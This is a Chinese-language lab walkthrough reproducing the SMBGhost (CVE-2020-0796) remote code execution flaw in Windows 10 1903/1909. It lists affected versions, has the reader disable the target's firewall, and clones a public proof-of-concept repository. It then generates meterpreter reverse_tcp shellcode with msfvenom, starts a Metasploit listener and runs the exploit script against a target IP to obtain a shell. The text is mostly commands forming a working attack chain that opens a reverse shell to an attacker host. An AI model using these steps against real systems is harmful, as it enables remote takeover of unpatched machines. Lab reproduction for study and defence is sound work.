前言
漏洞介绍
微软SMBv3 Client/Server远程代码执行漏洞CVE-2020-0796
影响范围:
Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)
环境搭建
win10 1903下载
ed2k://|file|cn_windows_10_business_editions_version_1903_updated_sept_2019_x64_dvd_2f5281e1.iso|5231140864|B1D5C4C401036B0B1EBA64476A95F338|/
用虚拟机打开安装
具体过程可以参考度娘
关闭防火墙
设置->更新和安全->windwos安全中心->防火墙和网络保护
关闭防火墙
poc下载
git clone --depth=1 https://hub.fastgit.org/chompie1337/SMBGhost_RCE_PoC.git
cd SMBGhost_RCE_PoC/
漏洞复现
生成shellcode
msfvenom -p windows/x64/meterpreter/reverse_tcp lhost=192.168.164.155 lport=4444 -f py -o shellcode.txt
将生成的shellcode替换exp中的exploit.py中的USER_PAYLOAD保存即可
启动msf和监听
msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 192.168.164.155
run
执行攻击脚本
python3 exploit.py -ip 192.168.164.164
获得shell
参考文章
https://www.freebuf.com/articles/others-articles/241937.html